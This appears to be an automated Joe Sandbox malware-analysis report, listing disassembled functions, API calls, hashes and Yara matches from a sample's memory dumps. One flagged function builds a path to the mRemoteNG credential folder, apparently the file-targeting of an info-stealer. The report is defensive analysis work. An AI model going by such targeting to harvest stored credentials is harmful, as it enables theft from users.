                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 956590011-0
                                                                                                                                                                                                                              • Opcode ID: 6e90c81242c1e9c2c94fc0c313d709a31f20b286baa74042e540fbb46101e8c2
                                                                                                                                                                                                                              • Instruction ID: 376db147b8e460b9c5b20c02fc9d29c717dfb07696c0b080504970435052c0a9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e90c81242c1e9c2c94fc0c313d709a31f20b286baa74042e540fbb46101e8c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FB1A171A04B858BDB02CF68C48055FF3F5FFC9328B144669E8999B342DB35E946CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BBB6060: moz_xmalloc.MOZGLUE(00000024,E3FAEE98,00000000,?,00000000,?,?,6BBB5FCB,6BBB79A3), ref: 6BBB6078
                                                                                                                                                                                                                              • free.MOZGLUE(-00000001), ref: 6BBB72F6
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBB7311
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$moz_xmalloc
                                                                                                                                                                                                                              • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                                                                                                                                                                                              • API String ID: 3009372454-760240034
                                                                                                                                                                                                                              • Opcode ID: fe63560ba46176c55de2456aafc5900e65a3142c91402958d2079d08fb14de10
                                                                                                                                                                                                                              • Instruction ID: 554bfc5fd4cc32208235ea8afc373ee5fd8c7ab4b6c4cb4f97bd8a850cb6d87f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe63560ba46176c55de2456aafc5900e65a3142c91402958d2079d08fb14de10
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0071B471F006598FDB08CF69D8906ADB7F2EF84304F25812DD81AAB210DB79E946CBD0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BBCC1F1
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BBCC293
                                                                                                                                                                                                                              • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6BBCC29E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: fgetc$memcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1522623862-0
                                                                                                                                                                                                                              • Opcode ID: b6dae3869af3c4bb960ca35af700ee66cc17be8188a9dc4cf11e490998db2462
                                                                                                                                                                                                                              • Instruction ID: e84fe60ac555634568877e41ef21f90c7137c8128b30715c0832cd36957b2003
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6dae3869af3c4bb960ca35af700ee66cc17be8188a9dc4cf11e490998db2462
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9661A971D046588FCB24CFACD8809AFBBB5EF89310F154569E812AB250C735A945CBE2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00417BAE
                                                                                                                                                                                                                                • Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
                                                                                                                                                                                                                                • Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
                                                                                                                                                                                                                                • Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D), ref: 00417BEA
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB
                                                                                                                                                                                                                                • Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2005412495-0
                                                                                                                                                                                                                              • Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
                                                                                                                                                                                                                              • Instruction ID: 2ecc3aad81c9b81e2b27e7e3d170e1f8428b359c85680f8586e03e13f1a28f2c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39314C70A58309DBDF509FA9D8846DDBBF1BB48314F10802BE001A6290EB7C49C5CFAD
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 6BBBCA57
                                                                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BBBCA69
                                                                                                                                                                                                                              • Sleep.KERNEL32 ref: 6BBBCADD
                                                                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BBBCAEA
                                                                                                                                                                                                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BBBCAF5
                                                                                                                                                                                                                              • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6BBBCB19
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 432163150-0
                                                                                                                                                                                                                              • Opcode ID: a524d6b4216b94334ef0e090ca795da38a4967679ee3071625b1bf2cc4a8f8c0
                                                                                                                                                                                                                              • Instruction ID: 206aab33e7f8d2037fc8f77a49e7600d492114c1a8cbf9e3fff40529ed867fb5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a524d6b4216b94334ef0e090ca795da38a4967679ee3071625b1bf2cc4a8f8c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B212131A047888BC708EF38A84217FB7BAFFC6345F408628E955A7194EFB9D585C781
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(00000104), ref: 6BB7EBB5
                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6BBAD7F3), ref: 6BB7EBC3
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6BBAD7F3), ref: 6BB7EBD6
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,6BBAD7F3), ref: 6BB7EBF6
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,6BBAD7F3), ref: 6BB7EC0E
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BB95EDB
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: memset.VCRUNTIME140(6BBD7765,000000E5,55CCCCCC), ref: 6BB95F27
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: LeaveCriticalSection.KERNEL32(?), ref: 6BB95FB2
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,6BBAD7F3), ref: 6BB7EC1A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2948488910-0
                                                                                                                                                                                                                              • Opcode ID: 81485d0c49b3105810225cd2d03b82bd07dffb633ad97cd427288f18b61c472e
                                                                                                                                                                                                                              • Instruction ID: 188b9a56b3c9f40eac65d31a10af782f65b09d23cfd842802c8cee2fd682846e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81485d0c49b3105810225cd2d03b82bd07dffb633ad97cd427288f18b61c472e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8511ECF1A442945BE7109A78AC89BAF7EACDF02758F140435E415DB340E3B9DD0487A2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(042F6BF8,?,?,?,0040F76C,?,042F6BF8,00000000), ref: 0041596C
                                                                                                                                                                                                                              • lstrcpyn.KERNEL32(C:\Users\user\AppData\Roaming\mRemoteNG\,042F6BF8,042F6BF8,?,0040F76C,?,042F6BF8), ref: 00415990
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,0040F76C,?,042F6BF8), ref: 004159A7
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004159C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                              • String ID: %s%s$C:\Users\user\AppData\Roaming\mRemoteNG\
                                                                                                                                                                                                                              • API String ID: 1206339513-1027354905
                                                                                                                                                                                                                              • Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                              • Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBC0270
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBC02E9
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBC02F6
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBC033A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                              • String ID: about:blank
                                                                                                                                                                                                                              • API String ID: 2047719359-258612819
                                                                                                                                                                                                                              • Opcode ID: f168bf8207b5814c9cd8ef3804d2ad3f6d4f31394fb69f366ab32615d9c4b0b9
                                                                                                                                                                                                                              • Instruction ID: a879cd03a4536a3d2a361ff4beb3b3133b1c405fc841f4c3acb4ce4cd4c9bba6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f168bf8207b5814c9cd8ef3804d2ad3f6d4f31394fb69f366ab32615d9c4b0b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4251BBB4A00659CFCB00DF68D880AAEB7F5FF89324F904559D919AB341D736F842CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BB84A68), ref: 6BBB945E
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BBB9470
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BBB9482
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: __Init_thread_footer.LIBCMT ref: 6BBB949F
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBE12F
                                                                                                                                                                                                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6BBBE084,00000000), ref: 6BBBE137
                                                                                                                                                                                                                                • Part of subcall function 6BBB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BBB94EE
                                                                                                                                                                                                                                • Part of subcall function 6BBB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BBB9508
                                                                                                                                                                                                                              • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6BBBE196
                                                                                                                                                                                                                              • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6BBBE1E9
                                                                                                                                                                                                                                • Part of subcall function 6BBB99A0: GetCurrentThreadId.KERNEL32 ref: 6BBB99C1
                                                                                                                                                                                                                                • Part of subcall function 6BBB99A0: AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBB99CE
                                                                                                                                                                                                                                • Part of subcall function 6BBB99A0: ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBB99F8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6BBBE13F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                              • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                                                                                                                                                                              • API String ID: 2491745604-3904374701
                                                                                                                                                                                                                              • Opcode ID: b07c8064ee71b9816ba7fefa64d889f3b66aa38f57427eaed9ef7f6e29d6341f
                                                                                                                                                                                                                              • Instruction ID: ad6521b37ee102ec005a356bcbb313e91733534a5530c28cbb35877e1fa5e6bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b07c8064ee71b9816ba7fefa64d889f3b66aa38f57427eaed9ef7f6e29d6341f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D3126B1A047809FD7049F28944137EF7E6EFDA388F00886DE8955B351DBB9C906C7A2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBB0222
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(0000000C), ref: 6BBB0231
                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BBB028B
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6BBB02F7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 2782572024-2766056989
                                                                                                                                                                                                                              • Opcode ID: 2e3ec79493a714e2370baed89da43470aa663589e481c8105a333a263c8a9888
                                                                                                                                                                                                                              • Instruction ID: f4adc0bed2dd406a1508bcf77407a42ef19b30fb69974369dcc4bf1d013d6881
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e3ec79493a714e2370baed89da43470aa663589e481c8105a333a263c8a9888
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31BEB2A00A508FEB54CF68C980B3AB7E6FF44714B54856DD95ADB340DB35EC05CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SearchPathW.KERNEL32(?,6BB9BFBD,.dll,00000000,00000000,00000000,6BB9BFBD), ref: 6BBDABBD
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(00000001), ref: 6BBDABD8
                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6BBDABEB
                                                                                                                                                                                                                              • SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6BBDAC03
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PathSearch$mallocmemsetmoz_xmalloc
                                                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                                                              • API String ID: 3063185715-2738580789
                                                                                                                                                                                                                              • Opcode ID: 6c0c7ebbd6a4e8b305551c9442a4963b83d1718b9087e4f8ed14d84481fd076c
                                                                                                                                                                                                                              • Instruction ID: 22652f1834075e9225b4c64a4ff11ed987dbb2f847b29b76db693b4570a6571a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c0c7ebbd6a4e8b305551c9442a4963b83d1718b9087e4f8ed14d84481fd076c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A001B5B2A0011A6FEB105E749C45ABFBAAEEF95350F050435FD09E3200E7BA9D558BB1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(ole32,?,6BB7EE51,?), ref: 6BB7F0B2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6BB7F0C2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • ole32, xrefs: 6BB7F0AD
                                                                                                                                                                                                                              • Could not find CoTaskMemFree, xrefs: 6BB7F0E3
                                                                                                                                                                                                                              • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6BB7F0DC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
